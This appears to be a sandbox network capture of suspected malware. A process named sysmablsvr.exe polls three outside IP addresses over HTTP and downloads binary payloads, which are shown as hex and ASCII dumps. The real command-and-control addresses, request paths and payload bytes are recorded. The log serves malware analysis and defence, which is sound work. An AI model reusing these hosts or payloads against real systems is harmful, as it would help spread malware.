                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            21          192.168.2.4  49767        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:45.230056047 CEST  166                OUT        GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:46.044327974 CEST  728                IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:45 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            22          192.168.2.4  49769        185.215.113.66  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:48.073307037 CEST  166                OUT        GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:10:48.783287048 CEST  728                IN         HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:10:48 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            23          192.168.2.4  49770        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:51.841388941 CEST  163                OUT        GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            24          192.168.2.4  49772        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:55.674081087 CEST  163                OUT        GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            25          192.168.2.4  49774        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:10:59.371454954 CEST  163                OUT        GET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            26          192.168.2.4  49776        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:11:03.072380066 CEST  163                OUT        GET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            27          192.168.2.4  49777        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:11:06.791554928 CEST  163                OUT        GET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            28          192.168.2.4  49779        77.91.77.92     80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:11:10.479190111 CEST  163                OUT        GET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                            29          192.168.2.4  49781        91.202.233.141  80                6768  C:\Windows\sysmablsvr.exe
                                            Timestamp                             Bytes transferred  Direction  Data
                                            Sep 17, 2024 23:11:15.450918913 CEST  166                OUT        GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:16.142934084 CEST  1236               IN         HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:16 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
30         | 192.168.2.4 | 49782       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:17.167273045 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:17.859571934 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:17 GMT
Content-Type: application/octet-stream
Content-Length: 12544
Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
Connection: keep-alive
ETag: "66e9aea8-3100"
Accept-Ranges: bytes


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
31         | 192.168.2.4 | 49785       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:23.975404978 CEST | 166 | OUT | GET /2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:24.665081978 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:24 GMT
Content-Type: application/octet-stream
Content-Length: 7936
Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
Connection: keep-alive
ETag: "66e17142-1f00"
Accept-Ranges: bytes


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
32         | 192.168.2.4 | 49786       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:26.714817047 CEST | 166 | OUT | GET /3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:27.404637098 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:27 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
33         | 192.168.2.4 | 49788       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:29.435178995 CEST | 166 | OUT | GET /4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:30.236568928 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:30 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
34         | 192.168.2.4 | 49789       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:32.277194023 CEST | 166 | OUT | GET /5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:33.049627066 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:32 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
35         | 192.168.2.4 | 49791       | 91.202.233.141 | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:35.093247890 CEST | 166 | OUT | GET /6 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 91.202.233.141
Sep 17, 2024 23:11:35.895641088 CEST | 728 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:35 GMT
Content-Type: text/html
Content-Length: 564
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
36         | 192.168.2.4 | 49793       | 185.215.113.66  | 80               | 6768 | C:\Windows\sysmablsvr.exe

Timestamp | Bytes transferred | Direction | Data
Sep 17, 2024 23:11:39.131509066 CEST | 166 | OUT | GET /1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Host: 185.215.113.66
Sep 17, 2024 23:11:39.986016989 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Sep 2024 21:11:39 GMT
Content-Type: application/octet-stream
Content-Length: 8200
Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
Connection: keep-alive
ETag: "66e9f056-2008"
Accept-Ranges: bytes


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            37 | 192.168.2.4 | 49794 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:41.029292107 CEST | 166 | OUT | GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:41.832546949 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:41 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 8200
                                            Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
                                            Connection: keep-alive
                                            ETag: "66e9f056-2008"
                                            Accept-Ranges: bytes
                                            Data Raw: 4e 47 53 21 00 02 00 00 21 a4 02 5f bf d7 06 d0 66 db 95 d0 b6 7e 4d 73 1b 12 a6 71 ad 9c e5 69 c6 d6 5b 25 88 98 4a 89 82 fe e6 74 a6 38 1a eb 3e 22 ce e3 a2 d2 d5 01 68 0a 70 a8 79 07 ca f9 4c 63 fc eb b6 98 72 6f 5b a4 fa 57 f8 5e 70 83 26 95 85 fd 2f c0 2e 95 74 aa 49 42 a7 2e 1a 40 26 ca ef af 2c b0 be 12 07 f5 63 f0 b4 78 4b 47 cd a7 59 fd 1a 5c 3f be ac ac 2a b7 38 39 74 51 f8 8f f1 22 99 30 94 dc b4 95 94 f6 e0 00 08 e6 10 ad 8e 8a e6 3c b4 85 fb 65 a2 c8 14 27 1d 9d 19 75 f6 6c 4b e3 b1 ff 4e 87 a5 56 da 0d e6 3d f0 be 3e 59 7a 8e 88 30 45 59 f1 90 41 a3 37 ea 67 46 78 11 40 c9 09 7a eb 59 32 7d 2d 1c ae 94 12 63 87 73 11 71 84 4f bc 40 49 13 a6 6e f1 3a cd c4 f3 e5 1f 2b 21 50 28 5a 0c 6c 89 1b ff 33 1a 7b ad 1d 43 06 27 ba db 3b 89 b8 22 d4 a0 52 4a f2 1c c3 4b 6d 64 b4 af 05 c5 78 c0 fd e7 1d f9 77 02 1a 85 6c 0a b5 58 1c 31 aa 89 b5 d0 1e 95 be 53 c5 61 fc c8 cc b2 b0 69 93 73 d5 12 6e a9 83 9e 7d 5f 77 e5 ab 7a 5d 52 54 6a c3 6e 39 15 f0 75 80 ae 26 ae 5d 7f ee 72 b2 fa 99 64 f7 32 71 [TRUNCATED]
                                            Data Ascii: NGS!!_f~Msqi[%Jt8>"hpyLcro[W^p&/.tIB.@&,cxKGY\?*89tQ"0<e'ulKNV=>Yz0EYA7gFx@zY2}-csqO@In:+!P(Zl3{C';"RJKmdxwlX1Saisn}_wz]RTjn9u&]rd2qM;+IK_+;Zh~XS]`iW7WA%nWr&+d7~k\:W?F%x!<*ao*W(s3cxvxze/UKEhoXnZ[}m<aDu}e2}YGBUcWJN4llf~x$V=lEZyp6v'-R~=&/B$K^Dh{$u?c\4b{6BToNBj6;8LTD6*=9$h@v/JMEC0H1oCcTmN{Y#[Mh"rDSp:7"m?\[xu`\pd.A$B?arVa-q'K^F.!|^\'_YJ\aP=C_QS/^Qf$hzT>P]@sy\}6]SE]hU\"2X\
                                            Sep 17, 2024 23:11:41.832598925 CEST1236INData Raw: 3b e7 4a 6f 07 26 f2 5f 3c 6d aa fe 95 db 97 f8 b0 2f 4b 12 56 5b b9 33 67 ae bb 5e ea 73 dd 88 84 53 85 7c 35 4b 29 f2 10 dc 76 6c 0a f8 7a 1e 15 12 80 4a 66 51 6c 2d 4d e3 7b cd c8 d5 04 a6 07 dd 75 70 2c 3e 0d 9f 90 09 28 ba 4a fe 89 ba 37 36
                                            Data Ascii: ;Jo&_<m/KV[3g^sS|5K)vlzJfQl-M{up,>(J76s}azeROI;QRpG9\6#N_46XPgg4Stb)2|4t'1;>eaJ:A}=ywQS<~a
                                            Sep 17, 2024 23:11:41.832653046 CEST1236INData Raw: ef ac c3 55 42 e6 3b 98 2e 10 6b 2b 45 a9 66 f5 d5 16 44 73 51 09 ae 9d 91 12 6b b4 10 4f d1 c2 03 0a 5a 70 d8 c5 59 46 f6 67 25 f5 80 81 b0 46 52 fd 2d 6c c9 b0 b1 40 70 3b 19 98 bd e1 02 df a7 8b bb 4d a4 5d 0c 38 fb 33 ac 89 0f 03 a1 e5 3c 8c
                                            Data Ascii: UB;.k+EfDsQkOZpYFg%FR-l@p;M]83<(QW\iH*"1MDKl,s0k%9lvf"]Nq.b5"Zfu#zD|%T&*o!wZB>AQ<kFU7ETbUOBE+x
                                            Sep 17, 2024 23:11:41.834614038 CEST1236INData Raw: 3d bf 19 32 51 c7 cf e1 45 4a 24 0f 7e 4e 03 98 f2 ad a0 d4 0f 32 6f 75 01 84 39 69 ed fd b8 cb 9e 48 a2 9c 50 d5 b2 79 14 11 ee 91 17 ba 1c 24 39 8d 18 18 28 03 ff 86 c8 ef ae ac 1a d9 d6 b5 31 3a 3a 09 d3 0a 33 8e 4e c7 77 bc 4f c5 dd ce f4 50
                                            Data Ascii: =2QEJ$~N2ou9iHPy$9(1::3NwOP[6Y^ZWKC@2l&6K!f WN,F*ZAEo:7V<EL~j|"hS=/0y(tjOJG.{oG!/CfoB=
                                            Sep 17, 2024 23:11:41.834651947 CEST1236INData Raw: 09 45 40 cc f4 00 13 05 a2 a7 3b 9a d3 53 a7 33 11 08 45 d0 f7 05 89 97 86 37 84 70 98 ae 1e 4f a7 4d c8 47 e4 a2 77 5f 9f 6e 38 26 20 80 04 a8 49 ea 31 e0 bb 5f 5e 28 72 0a 45 4c e7 b5 b1 56 a4 ae e1 a9 46 6b 1d 31 99 44 30 74 c3 c8 b8 30 a8 9e
                                            Data Ascii: E@;S3E7pOMGw_n8& I1_^(rELVFk1D0t0ijs?D7X="c'x-&Zd/=jJh8vYysq+?r=R=@NEm(m>itdQ@KE<9Pk-T
                                            Sep 17, 2024 23:11:41.834686041 CEST1236INData Raw: 89 49 c7 3c 2d df b3 58 1c 60 4c 81 18 ed 8f 3b a5 5d 02 56 f5 47 bb ba 9f 81 9b dd ef 17 8b 84 d8 e1 4c cd 58 be 03 74 25 f4 7f d0 21 51 1a ac b7 18 66 fd 44 98 b5 12 27 02 0c a5 2e 50 d2 b0 81 c8 e4 06 93 65 26 8a 0e fe 54 ea eb 45 df fd 3a e8
                                            Data Ascii: I<-X`L;]VGLXt%!QfD'.Pe&TE:d@.g;N+?)DGuHC]:gt^?k8b+T?]<IfbzxtHrBQ[gEo3%[lQc|E(#iUJ_YV]PaS3|O#?jHq{
                                            Sep 17, 2024 23:11:41.834723949 CEST1048INData Raw: 3e be b1 99 6a a9 f2 eb 53 a4 95 58 30 9b 67 20 a6 03 a5 c9 cd cc 88 df cc 88 07 5d 4e 31 24 43 f6 71 f1 69 34 e9 71 08 eb e5 22 54 a2 8b 81 12 76 c9 e1 2d d5 4b 0c 5a 36 d0 17 db 78 2d 1a d4 76 be d0 2c 49 df 87 18 62 9c f6 17 d4 3f 5d ac ca 70
                                            Data Ascii: >jSX0g ]N1$Cqi4q"Tv-KZ6x-v,Ib?]piXB {-E)P}D~MI.#l1z&IPcB/m0K{GJ]EeBj|)q/^y]~eKLZ|sJvsdfN


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            38 | 192.168.2.4 | 49796 | 185.215.113.66 | 80 | 6768 | C:\Windows\sysmablsvr.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Sep 17, 2024 23:11:43.982995987 CEST | 274 | OUT | GET /1 HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                            Host: 185.215.113.66
                                            Connection: Keep-Alive
                                            Sep 17, 2024 23:11:44.682634115 CEST | 1236 | IN | HTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:44 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 8200
                                            Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
                                            Connection: keep-alive
                                            ETag: "66e9f056-2008"
                                            Accept-Ranges: bytes
                                            Data Raw: 4e 47 53 21 00 02 00 00 21 a4 02 5f bf d7 06 d0 66 db 95 d0 b6 7e 4d 73 1b 12 a6 71 ad 9c e5 69 c6 d6 5b 25 88 98 4a 89 82 fe e6 74 a6 38 1a eb 3e 22 ce e3 a2 d2 d5 01 68 0a 70 a8 79 07 ca f9 4c 63 fc eb b6 98 72 6f 5b a4 fa 57 f8 5e 70 83 26 95 85 fd 2f c0 2e 95 74 aa 49 42 a7 2e 1a 40 26 ca ef af 2c b0 be 12 07 f5 63 f0 b4 78 4b 47 cd a7 59 fd 1a 5c 3f be ac ac 2a b7 38 39 74 51 f8 8f f1 22 99 30 94 dc b4 95 94 f6 e0 00 08 e6 10 ad 8e 8a e6 3c b4 85 fb 65 a2 c8 14 27 1d 9d 19 75 f6 6c 4b e3 b1 ff 4e 87 a5 56 da 0d e6 3d f0 be 3e 59 7a 8e 88 30 45 59 f1 90 41 a3 37 ea 67 46 78 11 40 c9 09 7a eb 59 32 7d 2d 1c ae 94 12 63 87 73 11 71 84 4f bc 40 49 13 a6 6e f1 3a cd c4 f3 e5 1f 2b 21 50 28 5a 0c 6c 89 1b ff 33 1a 7b ad 1d 43 06 27 ba db 3b 89 b8 22 d4 a0 52 4a f2 1c c3 4b 6d 64 b4 af 05 c5 78 c0 fd e7 1d f9 77 02 1a 85 6c 0a b5 58 1c 31 aa 89 b5 d0 1e 95 be 53 c5 61 fc c8 cc b2 b0 69 93 73 d5 12 6e a9 83 9e 7d 5f 77 e5 ab 7a 5d 52 54 6a c3 6e 39 15 f0 75 80 ae 26 ae 5d 7f ee 72 b2 fa 99 64 f7 32 71 [TRUNCATED]
                                            Data Ascii: NGS!!_f~Msqi[%Jt8>"hpyLcro[W^p&/.tIB.@&,cxKGY\?*89tQ"0<e'ulKNV=>Yz0EYA7gFx@zY2}-csqO@In:+!P(Zl3{C';"RJKmdxwlX1Saisn}_wz]RTjn9u&]rd2qM;+IK_+;Zh~XS]`iW7WA%nWr&+d7~k\:W?F%x!<*ao*W(s3cxvxze/UKEhoXnZ[}m<aDu}e2}YGBUcWJN4llf~x$V=lEZyp6v'-R~=&/B$K^Dh{$u?c\4b{6BToNBj6;8LTD6*=9$h@v/JMEC0H1oCcTmN{Y#[Mh"rDSp:7"m?\[xu`\pd.A$B?arVa-q'K^F.!|^\'_YJ\aP=C_QS/^Qf$hzT>P]@sy\}6]SE]hU\"2X\
                                            Sep 17, 2024 23:11:44.682692051 CEST224INData Raw: 3b e7 4a 6f 07 26 f2 5f 3c 6d aa fe 95 db 97 f8 b0 2f 4b 12 56 5b b9 33 67 ae bb 5e ea 73 dd 88 84 53 85 7c 35 4b 29 f2 10 dc 76 6c 0a f8 7a 1e 15 12 80 4a 66 51 6c 2d 4d e3 7b cd c8 d5 04 a6 07 dd 75 70 2c 3e 0d 9f 90 09 28 ba 4a fe 89 ba 37 36
                                            Data Ascii: ;Jo&_<m/KV[3g^sS|5K)vlzJfQl-M{up,>(J76s}azeROI;QRpG9\6#N_46XPgg4Stb)2|4t'1;>eaJ:A}=
                                            Sep 17, 2024 23:11:44.682729006 CEST1236INData Raw: 07 b2 d0 79 b4 77 0b 51 11 af 53 8c f3 3c ff d1 7e 61 83 2a a8 76 83 ee 9f e2 dc 27 60 e7 9b 08 17 f6 8a 62 10 23 69 1d 4b 4f 85 84 e3 b7 91 88 0e 09 f5 6b 75 a1 56 c8 0d fa 5b fd 12 55 70 9d d1 c6 88 05 76 2b 6a 68 cd fb 93 55 28 2f a5 66 78 b9
                                            Data Ascii: ywQS<~a*v'`b#iKOkuV[Upv+jhU(/fxGrUu]Wu#.^0[oyJu?.~>8^vAo-:6+XqzYg[/B.\\%gd."l,0U10,H*$oI$?cfKE
                                            Sep 17, 2024 23:11:44.682799101 CEST1236INData Raw: a8 37 c4 45 54 19 12 62 e5 55 4f 42 45 2b 78 e7 90 d8 e4 66 f0 9f a6 34 93 f7 d9 53 c7 e8 6f ef 0a b9 60 b1 d6 1e 02 21 79 43 0d b7 ed 37 ee 65 6f 2c 0b 7a 5f dd a6 98 29 25 e4 99 07 63 9b 17 41 11 49 eb eb 77 68 08 48 b9 f3 be a3 d8 1c 0d 8c 50
                                            Data Ascii: 7ETbUOBE+xf4So`!yC7eo,z_)%cAIwhHPl~%yT{&T.M'J%xX+QT_3}psbLABojv6V|Xk{p<$1,8K~#:LtH#H{:Aj/Xt\i6ep
                                            Sep 17, 2024 23:11:44.682832956 CEST1236INData Raw: f3 f3 2f 0b d0 fb 92 8e 43 9b 66 6f 42 3d cf fd 90 df f8 ed bc 98 31 d5 d0 f1 15 b4 11 c8 d8 63 95 cf be 7d b3 93 d5 63 17 66 8c 0d c3 b7 40 c8 d2 ae 32 e1 d5 24 47 29 ff 6b a7 97 27 5b 59 98 9a 0d a1 ac cc 01 34 32 70 7e a3 04 e8 e9 de b1 37 f1
                                            Data Ascii: /CfoB=1c}cf@2$G)k'[Y42p~7>:E-``qQJ`n`ED?*Z:/&,c{}J;GCzcw3g_|Dhi8-5O&(b)-0[Fyl"<!u/_
                                            Sep 17, 2024 23:11:44.682866096 CEST1236INData Raw: 06 0f 08 16 ab 4b 04 f9 45 3c 39 dc 50 ba 6b d0 99 2d 54 1b e1 fd ad a2 34 0a 75 09 19 5a af 3e 89 fd 65 ce 8c 20 b1 d5 17 a4 22 da 8a 88 2f d7 2e 64 67 86 b8 31 13 42 21 1d 77 d3 e0 3f 43 52 96 62 e1 ab e0 23 8d fa be 05 66 8f 56 9a 34 c8 db 66
                                            Data Ascii: KE<9Pk-T4uZ>e "/.dg1B!w?CRb#fV4f[U?j8,oz!\oDQbJ-xlWh,'123n]YmrP5Hh\#p1<PMVE2nR]A[|#)(JSbFrl%
                                            Sep 17, 2024 23:11:44.682899952 CEST896INData Raw: b4 19 aa be 7c 4f 23 f0 3f f2 6a 06 48 ed c3 71 cf d4 7b 05 21 7f 69 72 01 e0 8c e2 28 ea cf 4b 0a 57 3e 56 f7 58 28 fa 7b b8 94 e5 0f e7 88 c6 f1 3b 5f e0 df 2e 28 3b 88 74 c4 bb bb a0 c3 0e cb 29 c4 b4 39 ca c9 4e 1d 6e 12 38 2a e0 29 3a bb e0
                                            Data Ascii: |O#?jHq{!ir(KW>VX({;_.(;t)9Nn8*):sSY5.N=4TfGZGBAnI1$,E.wN]-@$U]J%d2L+T`YLl>I<yC;dLnHBj
                                            Sep 17, 2024 23:11:44.682940960 CEST892INData Raw: ca 87 43 bd 37 4d e9 0c fa 76 51 05 07 ac a2 63 36 22 93 64 4a 45 cb 02 89 1f 6b 38 9d 94 1b c2 05 7b 82 12 15 01 5d f1 47 60 11 62 f5 11 ab 0e ce de e4 41 74 e2 06 55 63 b1 ce ea 58 4c e8 9d 3e 9b 12 f0 96 84 68 eb 59 42 39 4e 38 45 8f f2 67 3c
                                            Data Ascii: C7MvQc6"dJEk8{]G`bAtUcXL>hYB9N8Eg<%35Tpt}%B<aL>jSX0g ]N1$Cqi4q"Tv-KZ6x-v,Ib?]piXB {-E)P}D~MI.#l1
